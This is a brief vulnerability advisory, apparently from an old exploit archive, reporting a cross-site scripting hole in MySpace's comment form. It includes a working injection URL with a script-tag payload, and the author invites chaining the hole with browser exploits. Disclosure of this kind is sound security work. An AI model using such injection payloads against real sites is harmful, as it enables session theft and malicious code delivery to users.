Myspace.com is vulnerable to XSS in the add comment function. Exploitation provided.
7c0981b07cb61e9a014cc2c718ac1bb06e5b2617782437f63d0c5921dfdb4717
MySpace.com - XSS hole
----------------------
Desc: Theres' a XSS hole in MySpace.com
Risk: Medium to High (can be used to include malicious code)
Discovered by : dyn0 (codeslag{hat}gmail.com) http://0xdeadface.co.uk
Site blurb : Myspace.com is another one of those crappy community sites for
cam whores/scene kids/emo kids/goths/generic fools. If you haven't heard of
then you must of been hiding under a rock for the past few years.
Hole description : The hole is in the add comment function, for this to work you
must be logged in and have a valid friendID.
Screenshot : http://0xdeadface.co.uk/myspace_xss.JPG
URL : http://www.myspace.com/index.cfm?fuseaction=user
&circuitaction=viewProfile_commentForm&friendID=[7-char-friend-id]
&name=%3Cscript%3Ealert(%220xdeadface%20owns%20you%22);%3C/script%3E
I have been able to confirm that this can be used for the inclusion of code (got any 0day IE exploits?)
Hugs & Kisses dyn0/codeslag
"When it came to throw brick through that starbucks window you left me all alone." - Against Me